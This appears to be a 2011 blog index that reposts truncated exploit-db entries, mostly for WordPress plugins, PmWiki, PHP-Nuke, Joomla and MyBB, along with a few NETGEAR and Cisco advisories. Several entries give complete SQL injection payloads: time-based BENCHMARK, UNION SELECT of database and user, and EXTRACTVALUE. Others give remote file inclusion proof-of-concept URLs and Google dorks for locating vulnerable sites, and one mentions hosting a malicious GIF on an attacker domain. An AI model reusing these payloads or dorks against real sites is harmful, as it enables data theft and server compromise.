PmWiki

23/11/2011 0 Comments

<?php /*     ————————————————————-     PmWiki <= 2.2.34 (pagelist) Remote PHP Code Injection Exploit     ————————————————————-          author……………: Egidio Romano aka EgiX     mail……………..: n0b0d13s[at]gmail[dot]com     software link……..: http://www.pmwiki.org/     affected versions….: from 2.0.0 to 2.2.34          +————————————————————————-+     | This proof of concept code was written for educational purpose only.    |     | Use it at your own risk. Author will be …

PHP-Nuke

23/11/2011 0 Comments

#!/usr/bin/perl # [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection # Date: 2010.07.04 after 50 days the bug was discovered. # Author/s: Dante90, WaRWolFz Crew # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, #               Shades Master, V1R5, yeat # Special Greetings To: The:Paradox # Greetings To: Shotokan-The Hacker, _mRkZ_, h473 # …

WordPress jetpack plugin SQL Injection Vulnerability

21/11/2011 0 Comments

###################################################### # Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability # Date: 2011-19-11 # Author: longrifle0x # software: WordPress # Download:http://wordpress.org/extend/plugins/jetpack/ # Tools: SQLMAP ###################################################### *DESCRIPTION Discovered a vulnerability in  jetpack, WordPress Plugin, vulnerability is SQL injection. File:wp-content/plugins/jetpack/modules/sharedaddy.php Exploit: id=-1; or 1=if *Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php [GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user=’None’ LIMIT 0,1)=’Y’) THEN 1 …

OSX universal ROP shellcode Testado no SNOW LEOPARD

03/10/2011 0 Comments

; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don’t want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; – put your ‘normal’ shellcode in x64_shellcode.asm ; – make ; – ./sc ; ; if you want …

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

23/09/2011 3 Comments

Sense of Security – Security Advisory – SOS-11-011 Release Date. 20-Sep-2011 Last Update. – Vendor Notification Date. 22-Mar-2011 Product. NETGEAR Wireless Cable Modem Gateway CG814WG Affected versions. Hardware 1.03, Software V3.9.26 R14 verified, possibly others Severity Rating. High Impact. Authentication bypass, Cross Site Request Forgery Attack Vector. Remote without authentication Solution Status. Upgrade to R15 …

JAKCMS PRO

23/09/2011 0 Comments

# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 Fonte: http://www.exploit-db.com/exploits/17882/

Multiple WordPress Plugin timthumb.php Vulnerabilites

23/09/2011 3 Comments

# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) — Description — The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com …

Cisco TelePresence Multiple Vulnerabilities – SOS-11-010

23/09/2011 0 Comments

Sense of Security – Security Advisory – SOS-11-010 Release Date. 19-Sep-2011 Last Update. – Vendor Notification Date. 21-Feb-2011 Product. Cisco TelePresence Series Platform. Cisco Affected versions. C < = TC4.1.2, MXP

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

23/09/2011 0 Comments

# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested) — PoC — http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI — Vulnerable Code — // Move folder request handled when called by GET AJAX if (isset($_GET[‘ru_folder’])) { // WP setup …

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

23/09/2011 0 Comments

# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested) — PoC — http://SERVER/WP_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work) — Vulnerable Code — if (isset($_FILES[‘wpmm-upload’])) { …

WordPress PureHTML plugin

06/09/2011 0 Comments

# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— if(!isset($_POST[‘PureHTMLNOnce’])){ if ( !wp_verify_nonce( $_POST[‘PureHTMLNOnce’], …

WordPress yolink Search plugin

06/09/2011 0 Comments

# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] …

WordPress wp audio gallery playlist plugin

06/09/2011 0 Comments

# Exploit Title: WordPress wp audio gallery playlist plugin < = 0.12 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip # Version: 0.12 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20 --------------- Vulnerable code --------------- $table_name = $wpdb->prefix …

WordPress Crawl Rate Tracker plugin

06/09/2011 0 Comments

# Exploit Title: WordPress Crawl Rate Tracker plugin < = 2.0.2 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip # Version: 2.0.2 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20 --------------- Vulnerable code --------------- class b3_chartData extends b3_sbTrackingConfig { …

WordPress Event Registration plugin

06/09/2011 0 Comments

# Exploit Title: WordPress Event Registration plugin < = 5.4.3 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip # Version: 5.4.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)–%20 ————— Vulnerable code ————— $id= $_REQUEST[‘id’]; … $sql = “SELECT * …

WordPress Contus HD FLV Player plugin

18/08/2011 0 Comments

# Exploit Title: WordPress Contus HD FLV Player plugin < = 1.3 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/contus-hd-flv-player.1.3.zip # Version: 1.3 (tested) --- PoC --- http://www.site.com/wp-content/plugins/contus-hd-flv-player/process-sortable.php?playid=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)&listItem[]=1 ————— Vulnerable code ————— $pid1 = $_GET[‘playid’]; foreach ($_GET[‘listItem’] as $position => $item) : mysql_query(“UPDATE $wpdb->prefix” . …

WordPress File Groups plugin

18/08/2011 0 Comments

# Exploit Title: WordPress File Groups plugin < = 1.1.2 SQL Injection Vulnerability # Date: 2011-08-17 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/file-groups.1.1.2.zip # Version: 1.1.2 (tested) --- PoC --- http://localhost/wp-content/plugins/file-groups/download.php?fgid=-1 AND 1=BENCHMARK(5000000,MD5(CHAR(87,120,109,121))) --------------- Vulnerable code --------------- $fgid = $_GET['fgid']; ... $file_list = $wpdb->get_col(“select guid from wp_posts where post_parent = $fgid”); http://www.exploit-db.com/exploits/17677/

WP E-commerce plugin

08/08/2011 0 Comments

# Exploit Title: WP E-commerce plugin < = 3.8.4 Sql Injection # Google Dork: inurl:page_id= “Your billing/contact details” # Date: 18/07/2011 # Author: IHTeam # Software Link: http://www.getshopped.org/ # Version: 3.8.4 # Tested on: 3.8.4 # Original Advisory: http://www.ihteam.net/advisory/wordpress-wp-e-commerce-plugin/

Joomla Component (com_jdirectory) SQL Injection Vulnerability

08/08/2011 0 Comments

===================================================================== .__ .__ __ .__ .___ ____ ___ _________ | | ____ |__|/ |_ |__| __| _/ _/ __ \ / /____ | | / _ | __ ______ | |/ __ | ___/ > < | |_> > |_( ) || | /_____/ | / /_/ | ___ >__/_ | __/|____/____/|__||__| |______ | / …

MyBB MyTabs (plugin) 0day SQL injection vulnerability

08/08/2011 0 Comments

===================================================================== MyBB 0day MyTabs (plugin) SQL injection vulnerability ===================================================================== # Exploit title : MyBB 0day MyTabs (plugin) SQL injection vulnerability. # Author: AutoRUN & dR.sqL # Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com # Date : 01 08 2011 # Tested on : Windows XP , Linux # Category : web apps # …